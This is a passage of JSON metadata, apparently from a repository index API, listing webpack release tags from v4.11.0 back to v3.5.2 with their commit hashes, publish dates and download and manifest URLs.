gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/host